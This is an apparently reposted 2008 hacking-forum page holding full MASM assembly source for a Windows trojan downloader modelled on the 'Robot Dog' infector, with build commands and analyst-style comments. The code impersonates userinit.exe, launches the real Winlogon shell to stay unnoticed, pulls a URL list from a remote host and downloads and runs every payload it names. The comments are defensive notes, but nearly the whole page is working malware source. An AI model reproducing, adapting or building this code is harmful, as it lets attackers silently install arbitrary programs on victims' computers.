下载者源码
2008-07-22 17:16:51 www.hackbase.com 来源:互联网
整理了下,然后添了一点注释。不敢多添,怕自己理解错了被人笑。;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>; 仿机器狗的感染文件代码; by naitm(http://hi.baidu.com/nai ...
整理了下,然后添了一点注释。不敢多添,怕自己理解错了被人笑。
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Downloader modelled on the "Robot Dog" (机器狗) file-infector code
; by naitm(http://hi.baidu.com/naitm)
;
; ml /c /coff /nologo userinit.asm
; Link /align:0x10 /subsystem:windows /nologo userinit.obj
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Analyst notes (review):
; - Behaviour visible in this listing: call user32!LoadRemoteFonts, run the
;   Winlogon "Shell" registry value via CreateProcess (the job userinit.exe
;   normally does), busy-wait until InternetGetConnectedState reports a
;   connection, fetch szUrlList into a temp file, then start one thread per
;   CR-terminated line that downloads that URL to another temp file and
;   executes it; ExitProcess is reached only after every thread has finished.
;   The build lines name the binary userinit, so it presumably stands in for
;   userinit.exe — the dropper/infector that places it is not on this page.
; - Host artifacts: temp files from GetTempFileName in the current directory
;   ('.'); read of HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell.
; - Network artifacts: WinINet HTTP with the agent string "Shell" (szValueName
;   is reused as the InternetOpen agent); list URL http://10.0.0.90/cert.cer,
;   a private-range address, so this published copy presumably points at the
;   author's own test host.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.386
.model flat,stdcall
option casemap:none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include file definitions
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include Advapi32.inc
includelib Advapi32.lib
include wininet.inc
includelib wininet.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Data segment
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data
nThreadCount dd 0                          ; live _DownloadEXERunIt threads: inc in main, dec in the thread (plain inc/dec, no lock prefix)
szTempPath db '.',0                        ; GetTempFileName path: temp files land in the current directory
szValueName db 'Shell',0                   ; Winlogon value name; also reused as the WinINet agent string
szUser32Dll db 'user32.dll',0
szLoadRemoteFonts db 'LoadRemoteFonts',0   ; export resolved and called at startup; its purpose is not established by this listing
szSubKey db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0
szUrlList db 'http://10.0.0.90/cert.cer',0 ; source of the URL list, one URL per CR-terminated line
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Code segment
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Start an exe using the current process's STARTUPINFO.
; @lpExePath: command line passed as lpCommandLine (CreateProcess may modify it).
; Callers ignore the return value. Note the two handles are closed only in the
; eax == 0 (failure) branch; on success both the process and thread handle stay open.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_RunIt proc @lpExePath
    local @stStartupInfo:STARTUPINFO
    local @stProcessInformation:PROCESS_INFORMATION
    invoke GetStartupInfo,addr @stStartupInfo
    invoke CreateProcess,NULL,@lpExePath,NULL,NULL,FALSE,NORMAL_PRIORITY_CLASS,\
        NULL,NULL,addr @stStartupInfo,addr @stProcessInformation
    .if eax == 0
        invoke CloseHandle,@stProcessInformation.hThread
        invoke CloseHandle,@stProcessInformation.hProcess
    .endif
    ret
_RunIt endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Download a file
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Fetch @lpURL over WinINet and write the body to @lpSaveFile.
; @lpURL: URL string; @lpSaveFile: destination path; @Buffer: timeout value (callers pass 1388h).
; Returns in eax the number of InternetReadFile chunks written (0 means nothing was saved).
; Observations for analysis:
; - @Buffer is passed in InternetSetOption's lpBuffer position as a value rather than a
;   pointer, so the two timeout calls presumably fail and the defaults stay in effect — confirm.
; - HttpQueryInfo reads the status code into @lpbuffer, but nothing compares it; only the
;   call's success is checked, so an HTTP error page body is saved like any other response.
_DownloadFile proc @lpURL,@lpSaveFile,@Buffer
    local @hInternet,@hInternetFile,@hLocalFile,@NumberOfBytesWritten,@nNumberOfBytesToWrite,@nWriteCount
    local @lpbuffer[200h]:BYTE
    xor eax,eax
    mov @nWriteCount,eax
    ; agent string is szValueName ("Shell") — a usable network signature for this sample
    invoke InternetOpen,offset szValueName,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0
    .if eax != NULL
        mov @hInternet, eax
        invoke InternetSetOption,@hInternet,INTERNET_OPTION_CONNECT_TIMEOUT,@Buffer,4
        invoke InternetSetOption,@hInternet,INTERNET_OPTION_CONTROL_RECEIVE_TIMEOUT,@Buffer,4
        invoke InternetOpenUrl,@hInternet,@lpURL,NULL,NULL,INTERNET_FLAG_EXISTING_CONNECT,0
        .if eax != NULL
            mov @hInternetFile, eax
            mov @nNumberOfBytesToWrite, 0
            mov @NumberOfBytesWritten, 200h
            ; status code is queried but never examined (see header note)
            invoke HttpQueryInfo,@hInternetFile,HTTP_QUERY_STATUS_CODE,addr @lpbuffer,\
                addr @NumberOfBytesWritten,@nNumberOfBytesToWrite
            .if eax != NULL
                invoke CreateFile,@lpSaveFile,GENERIC_WRITE,0,NULL,OPEN_ALWAYS,0,0
                .if eax != 0FFFFFFFFh                      ; INVALID_HANDLE_VALUE
                    mov @hLocalFile, eax
                    ; copy the response in 200h-byte chunks until InternetReadFile fails or returns 0 bytes
                    .while TRUE
                        mov @nNumberOfBytesToWrite,0
                        invoke InternetReadFile,@hInternetFile,addr @lpbuffer,200h,addr @nNumberOfBytesToWrite
                        .break .if (!eax)
                        .break .if (@nNumberOfBytesToWrite==0)
                        inc @nWriteCount
                        invoke WriteFile,@hLocalFile,addr @lpbuffer,@nNumberOfBytesToWrite,addr @NumberOfBytesWritten,0
                    .endw
                    ; OPEN_ALWAYS reuses an existing file, so truncate to what was just written
                    invoke SetEndOfFile,@hLocalFile
                    invoke CloseHandle,@hLocalFile
                .endif
            .endif
            invoke InternetCloseHandle,@hInternetFile
        .endif
        invoke InternetCloseHandle,@hInternet
    .endif
    mov eax,@nWriteCount
    ret
_DownloadFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Thread entry (started by main via CreateThread) for one URL from the list.
; @lpURL: pointer to the caller's line buffer. The URL is copied out immediately
; because main zeroes and reuses that buffer about 64h ms after starting the thread.
; Tries the download up to 3Ch (60) times one second apart, runs the temp file on
; the first success, then decrements nThreadCount so main can exit.
_DownloadEXERunIt proc @lpURL
    local @DownTimes
    local @TempFileName[100h]:BYTE
    local @szUrl[100h]:BYTE
    mov @DownTimes,3Ch
    invoke lstrcpy,addr @szUrl,@lpURL
    invoke RtlZeroMemory,addr @TempFileName,100h
    ; temp file in the current directory ('.'); host artifact worth collecting in IR
    invoke GetTempFileName,offset szTempPath,NULL,0,addr @TempFileName
    .repeat
        invoke _DownloadFile,addr @szUrl,addr @TempFileName,1388h
        .if eax != NULL
            invoke _RunIt,addr @TempFileName
            .break
        .else
            invoke Sleep,3E8h
            dec @DownTimes
        .endif
    .until (!@DownTimes)
    dec nThreadCount
    ret
_DownloadEXERunIt endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Entry point. Sequence: LoadRemoteFonts -> run Winlogon Shell value -> wait for
; connectivity -> fetch URL list -> one thread per CR-terminated line -> wait for
; threads -> ExitProcess. @szWinlogonPath is reused for the Shell command line, the
; list temp file name, and then each parsed URL line.
start:
main proc
    local @hKey,@nSizeOfPath,@hFile,@hObject,@lpBaseAddress
    local @szWinlogonPath[104h]:BYTE
    ; Load user32.dll and call LoadRemoteFonts (the original author asks what this function does;
    ; this listing does not establish its effect)
    invoke LoadLibrary,offset szUser32Dll
    .if eax != NULL
        invoke GetProcAddress,eax,offset szLoadRemoteFonts
        .if eax != NULL
            call eax
        .endif
    .endif
    ; Original comment: "start winlogon". The code actually reads the Winlogon "Shell" value
    ; and runs whatever it names — the normal duty of userinit.exe, which this binary mimics.
    invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,offset szSubKey,0,KEY_READ,addr @hKey
    .if eax == ERROR_SUCCESS
        mov @nSizeOfPath,104h
        invoke RtlZeroMemory,addr @szWinlogonPath,104h
        invoke RegQueryValueEx,@hKey,offset szValueName,0,NULL,addr @szWinlogonPath,addr @nSizeOfPath
        invoke _RunIt,addr @szWinlogonPath
        invoke RegCloseKey,@hKey
    .endif
    ; Check whether the network is connected; retry without pause until it is
    invoke Sleep,3E8h
    .while TRUE
        invoke InternetGetConnectedState,addr @nSizeOfPath,0   ; @nSizeOfPath reused as the flags output
        .break .if eax
    .endw
    ; Get a temp file name and download the list into it (retried until _DownloadFile returns non-zero)
    invoke RtlZeroMemory,addr @szWinlogonPath,104h
    invoke GetTempFileName,offset szTempPath,0,0,addr @szWinlogonPath
    invoke Sleep,3E8h
DownloadList:
    .while TRUE
        invoke _DownloadFile,offset szUrlList,addr @szWinlogonPath,1388h
        .break .if eax
    .endw
    ; Open the list file; after a size check, start the per-URL downloads
    invoke CreateFile,addr @szWinlogonPath,GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL
    .if eax != INVALID_HANDLE_VALUE
        mov @hFile,eax
        invoke GetFileSize,@hFile,NULL
        .if eax >= 0Fh ; a file smaller than 0Fh bytes is treated as a failed download
            invoke CreateFileMapping,@hFile,NULL,PAGE_READONLY,0,0,NULL
            .if eax != NULL
                mov @hObject,eax
                invoke MapViewOfFile,eax,FILE_MAP_READ,0,0,0
                .if eax != NULL
                    mov @lpBaseAddress,eax
                    mov esi,eax
BeginDownEXE:
                    lea edi,@szWinlogonPath
                    invoke RtlZeroMemory,edi,104h
                    ; Copy bytes into @szWinlogonPath until a CR (0Dh); LF (0Ah) is skipped.
                    ; On CR, a non-empty line is handed to a new _DownloadEXERunIt thread and
                    ; the buffer is reset. The scan ends at the first 0 byte, so it relies on the
                    ; mapped view being zero-padded past EOF, and a final line without a CR is
                    ; never dispatched. No bound is applied on the 104h-byte buffer.
                    .repeat
                        lodsb
                        .if al == 0Ah
                            lodsb
                        .endif
                        .if al == 0Dh
                            .if @szWinlogonPath != 0
                                inc nThreadCount
                                invoke CreateThread,NULL,0,offset _DownloadEXERunIt,addr @szWinlogonPath,0,addr @nSizeOfPath
                                invoke CloseHandle,eax
                                ; the thread must lstrcpy the line within this pause, since the buffer is reused next
                                invoke Sleep,64h
                            .endif
                            jmp BeginDownEXE
                        .endif
                        stosb
                    .until (!al)
                    invoke UnmapViewOfFile,@lpBaseAddress
                .endif
                invoke CloseHandle,@hObject
            .endif
        .else
            invoke CloseHandle,@hFile
            jmp DownloadList
        .endif
        invoke CloseHandle,@hFile
    .else
        jmp DownloadList ; if the list cannot be opened, download it again
    .endif
    ; Keep sleeping until all download threads have finished
    .while nThreadCount
        invoke Sleep,64h
    .endw
    invoke ExitProcess,0
main endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start








